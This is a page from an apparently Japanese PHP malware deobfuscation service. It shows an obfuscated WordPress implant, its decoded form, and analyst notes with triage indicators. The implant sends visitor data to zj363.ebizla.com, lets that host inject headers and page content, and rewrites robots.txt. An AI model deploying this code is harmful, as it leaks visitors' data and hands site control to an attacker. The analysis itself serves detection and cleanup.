WordPress などで見つかる PHP のマルウェア・ウイルス・改ざんコードをオンラインでデコードして難読化を解除し、
元の読みやすいコードに戻して解読できます。
<?php /*
 * Analyst notes: obfuscated sample exactly as submitted to the deobfuscator.
 * The decoded form of the same script follows below on this page.
 *
 * Obfuscation layers visible in this listing:
 *   - Every statement is a labelled fragment chained with goto. Execution
 *     starts at `goto w3Ivq` (the error_reporting call), so the textual order
 *     of the fragments is not the execution order.
 *   - String literals are written as mixed octal/hex escapes, for example
 *     "\x65\x78\x69\x74" is "exit" and "\x70\151\x6e\x67" is "ping".
 *   - Integer constants are hidden as round() of float sums, for example
 *     round(0.4563 + 0.5437) is 1 and round(0 + 0 + 0) is 0.
 *   - Built-in function names use random letter case; PHP resolves function
 *     names case-insensitively, so Curl_SetopT is curl_setopt.
 *
 * The visible code contains no eval or other dynamic code execution; all
 * behaviour can be recovered statically by following the goto chain and
 * decoding the escapes, which is what the decoded listing does.
 *
 * Scanning hint: dense goto chains combined with fully escaped strings and
 * round() of float sums rarely appear in hand-written PHP, so their
 * combination is a useful heuristic when reviewing files on a site.
 */ goto w3Ivq; TOOF1: if (!($Qt2Pa == "\x65\x78\x69\x74")) { goto cb6Py; } goto TYptK; CV1GM: echo "\110\x54\x54\120\57\x31\56\x30\40\64\x30\x34\40\116\x6f\x74\40\106\x6f\x75\x6e\144\x5f\x5f\x5f" . $CBxOi . "\137\137\137" . $XRM8O; goto ocggp; kBrPR: if (!(PrEG_MaTcH("\x2f\152\160\62\x30\x32\63\57\x73\151", $_SERVER["\x52\105\x51\x55\105\123\x54\137\x55\122\x49"]) == RouND(0.4563 + 0.5437))) { goto x6KFI; } goto M6Q_C; vbJoC: Curl_SetopT($t5UQ0, CURLOPT_RETURNTRANSFER, roUND(0.2296698 + 0.25431247 + 0.312 + 0.1049778 + 0.0985707)); goto Ut09H; LCNhg: $o2a8S = "\57\x69\x6e\144\145\170\x2e\x70\x68\x70\77\126\x53\75" . $XRM8O . "\46\x47\120\75" . $CBxOi; goto Kjf6N; suRfg: $CBxOi = "\172\152\63\x36\63"; goto LNU0T; Fq3XY: foreach ($RYHfB as $ET2jI) { goto ssJrr; Z4WnG: $lD0mT = STR_RepLacE("\57", "\137", $lD0mT); goto ZgQIx; qF2D1: $lD0mT = sTr_REpLAce("\x2b", "\55", $lD0mT); goto Z4WnG; ssJrr: $vhKCJ = isset($_SERVER[$ET2jI]) ? $_SERVER[$ET2jI] : ''; goto Biu3V; ZgQIx: $lD0mT = sTr_rEplAcE("\x3d", "\56", $lD0mT); goto V0wO3; BUgcu: WfTDO: goto EIvGM; Biu3V: $lD0mT = Base64_eNCOde(TRIm($vhKCJ)); goto qF2D1; V0wO3: $o2a8S .= "\46" . $ET2jI . "\x3d" . 
$lD0mT; goto BUgcu; EIvGM: } goto pWfoe; rJUE7: Iw8Qi: goto CV1GM; Kjf6N: $RYHfB = array("\x53\103\122\111\120\x54\137\x4e\x41\x4d\105", "\122\x45\x51\x55\x45\x53\124\x5f\x55\x52\111", "\x48\124\x54\x50\x53", "\122\105\x51\125\105\123\124\x5f\123\x43\110\105\x4d\105", "\x53\105\122\x56\x45\122\x5f\x50\117\122\124", "\122\105\x4d\x4f\x54\105\137\101\x44\104\122", "\x48\x54\x54\x50\x5f\122\105\x46\105\122\x45\x52", "\x48\124\x54\x50\137\x41\103\x43\x45\120\x54\137\x4c\101\116\x47\x55\x41\x47\x45", "\x48\x54\x54\x50\137\125\x53\105\x52\x5f\101\107\105\116\124", "\110\x54\124\120\x5f\110\117\x53\124"); goto Fq3XY; FhED6: $at3DT = tRIm($yI5XT[roUnD(0.49818402 + 0.502)]); goto nn9ul; F4ugF: $tchaq = coUNT($yI5XT); goto I1Vb9; eT33f: ARRAY_POp($sawfx); goto PQr_Y; iqPOj: XdLk6: goto MhPsr; RKiUC: if (!empty($gJbJb)) { goto YiiVN; } goto Y5OsT; Ut09H: cuRl_seTopT($t5UQ0, CURLOPT_CONNECTTIMEOUT, rOUnd(6.9481 + 3.052)); goto MNFDU; xuJEc: MVSwC: goto DRTHq; FbCQX: goto ZlxT7; goto iqPOj; TYptK: exit; goto aApq5; o8VKE: $sawfx = ExplODE("\x3c\142\162\x2f\76", $at3DT); goto eT33f; aApq5: cb6Py: goto uf0dp; eN93L: echo $at3DT; goto xuJEc; mjifa: $e0cIs = "\125\163\145\162\55\141\x67\x65\x6e\x74\72\52" . 
PHP_EOL; goto c9DD1; nF5JG: gJDLR: goto FhED6; D4gH2: echo "\162\157\142\x6f\x74\163\56\164\170\164\40\x64\157\x6e\x65"; goto zc5T8; WjOu8: Rqv9t: goto lMegx; MhPsr: heADEr("\x48\124\124\120\57\x31\x2e\x30\40\64\x30\64\40\x4e\x6f\164\x20\x46\157\165\156\144"); goto Vm6tj; w3Ivq: ERrOr_REPORTiNg(RoUNd(0 + 0 + 0)); goto suRfg; mawLH: HEADeR("\x48\x54\x54\120\x2f\x31\56\60\x20\64\60\x34\x20\x4e\x6f\x74\x20\106\x6f\165\x6e\144"); goto rJUE7; M1Iy_: HEaDEr($AZiUQ); goto nF5JG; OtOqw: $gJbJb = tRIm($gJbJb); goto VQ511; O0T2T: YiiVN: goto OtOqw; dIQys: $t5UQ0 = curL_INIt(); goto UxwGz; UxwGz: cUrL_seTOPt($t5UQ0, CURLOPT_URL, $CV76H); goto vbJoC; y3Zt3: x6KFI: goto SKfIJ; Vm6tj: exit; goto yFiPV; MNFDU: $gJbJb = CUrL_ExeC($t5UQ0); goto l5L8K; L0BG4: curL_CLoSe($t5UQ0); goto RKiUC; ocggp: exit; goto y3Zt3; rxFXI: if (empty($AZiUQ)) { goto gJDLR; } goto M1Iy_; nn9ul: if (empty($at3DT)) { goto MVSwC; } goto eN93L; lMegx: fILe_PUT_CONtenTs($_SERVER["\104\117\103\125\115\x45\x4e\x54\x5f\x52\x4f\117\x54"] . "\57\162\x6f\142\x6f\x74\x73\x2e\x74\170\164", $e0cIs); goto D4gH2; M6Q_C: if (!(PReg_mAtch("\x2f\x6a\x70\62\60\x32\63\x63\x77\167\57\163\151", $_SERVER["\x52\x45\x51\125\x45\123\x54\x5f\125\122\x49"]) == rOUNd(0 + 0 + 0 + 0 + 0 + 0 + 0 + 0 + 0))) { goto Iw8Qi; } goto mawLH; zc5T8: exit; goto kiwFy; I1Vb9: if ($tchaq < 3) { goto XdLk6; } goto gT6kW; SKfIJ: $l2pTy = "\x68\164\164\160\72\57\x2f" . $CBxOi . "\x2e\x65\x62\x69\x7a\154\x61\56\x63\157\x6d"; goto LCNhg; VQ511: $yI5XT = eXPLoDE("\x7c\x40\x23\44\174", $gJbJb); goto F4ugF; c9DD1: $e0cIs .= "\x41\154\154\157\167\72\57" . PHP_EOL; goto o8VKE; Y5OsT: $gJbJb = FilE_get_cOnTeNts($CV76H); goto O0T2T; DRTHq: $Qt2Pa = trIm($yI5XT[$tchaq - rouND(0.29826 + 0.398166 + 0.3035714)]); goto TOOF1; kiwFy: ovD9C: goto FbCQX; l5L8K: $gJbJb = tRim($gJbJb); goto L0BG4; uf0dp: if (!($Qt2Pa == "\x70\151\x6e\x67")) { goto ovD9C; } goto mjifa; BiVrT: $CV76H = $l2pTy . 
$o2a8S; goto dIQys; pWfoe: dhC9N: goto BiVrT; LNU0T: $XRM8O = "\161\157\x31"; goto kBrPR; PQr_Y: foreach ($sawfx as $Tq_l3) { $e0cIs .= "\123\x69\164\145\155\141\x70\x3a" . $Tq_l3 . PHP_EOL; DCw8O: } goto WjOu8; gT6kW: $AZiUQ = TRim($yI5XT[rounD(0 + 0 + 0 + 0 + 0 + 0 + 0 + 0 + 0)]); goto rxFXI; yFiPV: ZlxT7:
<?php /*
 * Analyst notes: deobfuscator output for the sample above (reading copy).
 *
 * Listing caveats:
 *   - The page has collapsed the output onto one long line, so the tool's
 *     "// [PHPDeobfuscator] Implied script end" line comment now swallows the
 *     rest of that physical line. Read this listing; do not treat it as
 *     runnable PHP.
 *   - The two `$e0cIs = "User-agent:...PHP_EOL..."` assignments are a tool
 *     artifact. In the obfuscated original the PHP_EOL constant is
 *     concatenated (`. PHP_EOL`) and the second statement appends with `.=`,
 *     so the real value is a "User-agent" line followed by an "Allow" line.
 *
 * Behaviour shown by the code:
 *   1. Error reporting is switched off.
 *   2. When REQUEST_URI does not match /jp2023/si, the script builds
 *      http://zj363.ebizla.com/index.php?VS=qo1&GP=zj363 and appends one
 *      query parameter per listed $_SERVER key (script name, URI, scheme,
 *      port, REMOTE_ADDR, referer, accept-language, user agent, host). Each
 *      value is trimmed, base64-encoded, and has + / = replaced by - _ .
 *   3. That URL is fetched with cURL (return-transfer on, connect timeout
 *      round(10.0001) = 10); if the trimmed result is empty, the fetch is
 *      retried with file_get_contents.
 *   4. The response is split on the delimiter "|@#$|". Fewer than three
 *      fields: a 404 header is sent and the script exits.
 *   5. Field 0, when non-empty, is passed to header(); field 1, when
 *      non-empty, is echoed. The remote host therefore controls both a
 *      response header and the page body served to the visitor.
 *   6. The last field is a command: "exit" stops the script; "ping" rewrites
 *      DOCUMENT_ROOT/robots.txt with the User-agent and Allow lines plus one
 *      "Sitemap:" line per piece of field 1 split on "<br/>" (the last piece
 *      is dropped by array_pop), echoes "robots.txt done" and exits; any
 *      other value lets the script end after step 5.
 *   7. When REQUEST_URI matches /jp2023/si, nothing is fetched. A 404 header
 *      is sent unless the URI also matches /jp2023cww/si, and in both cases
 *      the body "HTTP/1.0 404 Not Found___zj363___qo1" is echoed.
 *      NOTE(review): this looks like a presence marker for the implant;
 *      inferred from the fixed identifiers in the string, not shown by code.
 *
 * Indicators on this page for triage of an affected site: outbound HTTP to
 * zj363.ebizla.com, the "|@#$|" delimiter, the ___zj363___qo1 marker string,
 * and an unexpectedly rewritten robots.txt that lists Sitemap entries.
 * Because step 6 writes robots.txt, removing the injected PHP alone does not
 * restore that file; check it separately.
 */ ERrOr_REPORTiNg(RoUNd(0)); $CBxOi = "zj363"; $XRM8O = "qo1"; if (!(PrEG_MaTcH("/jp2023/si", $_SERVER["REQUEST_URI"]) == RouND(1.0))) { $l2pTy = "http://zj363.ebizla.com"; $o2a8S = "/index.php?VS=qo1&GP=zj363"; $RYHfB = array("SCRIPT_NAME", "REQUEST_URI", "HTTPS", "REQUEST_SCHEME", "SERVER_PORT", "REMOTE_ADDR", "HTTP_REFERER", "HTTP_ACCEPT_LANGUAGE", "HTTP_USER_AGENT", "HTTP_HOST"); foreach ($RYHfB as $ET2jI) { $vhKCJ = isset($_SERVER[$ET2jI]) ? $_SERVER[$ET2jI] : ''; $lD0mT = Base64_eNCOde(TRIm($vhKCJ)); $lD0mT = sTr_REpLAce("+", "-", $lD0mT); $lD0mT = STR_RepLacE("/", "_", $lD0mT); $lD0mT = sTr_rEplAcE("=", ".", $lD0mT); $o2a8S .= "&" . $ET2jI . "=" . $lD0mT; } $CV76H = $l2pTy . $o2a8S; $t5UQ0 = curL_INIt(); cUrL_seTOPt($t5UQ0, CURLOPT_URL, $CV76H); Curl_SetopT($t5UQ0, CURLOPT_RETURNTRANSFER, roUND(0.9995307700000001)); cuRl_seTopT($t5UQ0, CURLOPT_CONNECTTIMEOUT, rOUnd(10.0001)); $gJbJb = CUrL_ExeC($t5UQ0); $gJbJb = tRim($gJbJb); curL_CLoSe($t5UQ0); if (!empty($gJbJb)) { goto YiiVN; } $gJbJb = FilE_get_cOnTeNts($CV76H); YiiVN: $gJbJb = tRIm($gJbJb); $yI5XT = eXPLoDE("|@#\$|", $gJbJb); $tchaq = coUNT($yI5XT); if ($tchaq < 3) { heADEr("HTTP/1.0 404 Not Found"); exit; } $AZiUQ = TRim($yI5XT[rounD(0)]); if (empty($AZiUQ)) { goto gJDLR; } HEaDEr($AZiUQ); gJDLR: $at3DT = tRIm($yI5XT[roUnD(1.00018402)]); if (empty($at3DT)) { goto MVSwC; } echo $at3DT; MVSwC: $Qt2Pa = trIm($yI5XT[$tchaq - rouND(0.9999974)]); if (!($Qt2Pa == "exit")) { if (!($Qt2Pa == "ping")) { // [PHPDeobfuscator] Implied script end return; } $e0cIs = "User-agent:*PHP_EOL"; $e0cIs = "User-agent:*PHP_EOLAllow:/PHP_EOL"; $sawfx = ExplODE("<br/>", $at3DT); ARRAY_POp($sawfx); foreach ($sawfx as $Tq_l3) { $e0cIs .= "Sitemap:" . $Tq_l3 . PHP_EOL; } fILe_PUT_CONtenTs($_SERVER["DOCUMENT_ROOT"] . 
"/robots.txt", $e0cIs); echo "robots.txt done"; exit; } exit; } if (!(PReg_mAtch("/jp2023cww/si", $_SERVER["REQUEST_URI"]) == rOUNd(0))) { goto Iw8Qi; } HEADeR("HTTP/1.0 404 Not Found"); Iw8Qi: echo "HTTP/1.0 404 Not Found___" . $CBxOi . "___" . $XRM8O; exit;